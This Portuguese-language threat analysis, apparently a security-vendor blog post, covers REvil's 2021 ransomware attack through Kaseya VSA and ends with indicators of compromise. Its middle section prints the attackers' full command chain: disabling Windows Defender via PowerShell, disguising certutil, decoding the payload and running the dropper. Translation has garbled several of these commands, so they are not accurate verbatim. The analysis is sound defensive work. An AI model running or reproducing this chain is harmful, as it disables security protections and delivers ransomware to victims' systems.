🚀 A CloudSEK se torna a primeira empresa de segurança cibernética de origem indiana a receber investimentos da Estado dos EUA fundo
Leia mais

Em 02 de julho de 2021, a Kaseya, desenvolvedora de soluções de TI voltada para provedores de serviços gerenciados (MSPs), divulgou que eles foram vítimas de um ataque de ransomware em grande escala. O ataque, que foi propagado pelo popular grupo RaaS REvil, teve como alvo a infraestrutura VSA da Kaseya, comprometendo suas cadeias de suprimentos. O grupo de ransomware explorou uma vulnerabilidade específica de autenticação de dia zero no aplicativo para fazer upload de um arquivo malicioso codificado em Base64, infectando a infraestrutura do cliente que tem um programa agente VSA em execução nos servidores de destino.
O VSA da Kaseya é um software de monitoramento e gerenciamento remoto (RMM) que permite que os MSPs realizem gerenciamento de patches, backups e monitoramento de clientes para clientes. Os agentes da ameaça aproveitaram uma vulnerabilidade de desvio de autenticação de dia zero na interface web do VSA para obter uma sessão autenticada, carregar carga útil e executar uma série de comandos via SQL para obter a execução do comando. O ransomware foi entregue como uma atualização de software disfarçada como “Kaseya VSA Agent Hot-fix”. Esse procedimento implantou um criptografador, que comprometeu o servidor VSA e foi descartado no TempPath, com o nome de arquivo “agent.crt”.
O arquivo de carga útil “agent.crt” é enviado para um programa de monitoramento de agentes (C:\PROGRAM FILES (X86)\ KASEYA\<ID>\ AGENTMON.EXE, em que ID é a chave de identificação do servidor conectado à instância do monitor), que monitora os endpoints do cliente e determina se um terminal precisa de patches ou atualizações, apenas para instalá-los silenciosamente em segundo plano. O monitor do agente então grava “agent.crt” no diretório de trabalho do agente VSA (C:\KWORKING\AGENT.crt).
“C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nulo &
C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe Set-mpPreference -DisableRealtime Monitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MapsReporting Disabled -SubmitSampleConsent Nunca envie e copie /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe c:\kworking\agent.exe
O comando a seguir é usado para atrasar ou desativar a execução dos comandos do PowerShell:
“C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nulo
Em seguida, um comando do PowerShell é executado pelo monitor do agente, conforme mostrado abaixo:
C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe Set-MPreference
Esses comandos desativam várias proteções implementadas no sistema de destino, especificamente recursos do Windows Defender, como proteção de rede, iOfficeAntivirus (IOAV), verificação de scripts, relatórios do MAPS etc.
O comando a seguir cria uma cópia do arquivo “certutil.exe”, um utilitário de gerenciamento de certificados presente em todas as versões do Windows, do local padrão para o Diretório do Windows e o renomeia como “cert.exe”:
copiar /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
Essa linha de comando anexa dados aleatórios ao final do cert.exe para alterar sua assinatura, o que ajuda a evitar produtos de segurança antimalware:
echo %RANDOM% >> C:\Windows\cert.exe
O próximo comando decodifica o arquivo “agent.crt” para “agent.exe”:
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
Em seguida, essa linha de comando limpa o arquivo e executa “agent.exe”:
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Agent.exe é um dropper que baixa os seguintes artefatos:
ArtifactsDescriptionMSMPeng.exeComponente Windows Defender assinado por MicrosoftMPSvc.dll Parte de MsMpEng.exeO REvil usa uma versão específica do “MsMpEng.exe”, que é vulnerável ao carregamento lateral da biblioteca de vínculo dinâmico (DLL), que é um método popular de ataque cibernético que aproveita a forma como os aplicativos lidam com arquivos DLL. Ele usa arquivos DLL maliciosos em vez de arquivos legítimos, que são então carregados e executados, infectando o servidor de destino.
Um Ransomware Locker está oculto no arquivo “mpsvc.dll” e é executado quando “MsMpEng.exe” é executado pelo arquivo “agent.exe”. Essa é uma tática de evasão empregada pelo agente da ameaça para contornar as verificações de segurança.
C:\Windows\cert.exe
(Observação: usar esse hash é ineficaz, pois é uma versão do arquivo certutil.exe com adição aleatória de caracteres. Você deve usar a detecção baseada em comportamento, por exemplo, renomear/copiar certutil.exe)
C:\windows\msmpeng.exe
(Observação: esse arquivo é uma versão mais antiga do Windows Defender. É um binário legítimo, mas é usado para fins maliciosos por adversários como outras ferramentas que vivem fora da terra.)
C:\Program Files (x86)\ Kaseya\<ID>\ AgentMon.exe (binário legítimo do Kaseya VSA usado para execução remota)
Domínios https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txtYARA Rules https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rulesRegistry KEYSHKEY_LOCAL_MACHINE\ SOFTWARE\ Wow6432Node\ BlackLivesMatter
Referências
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/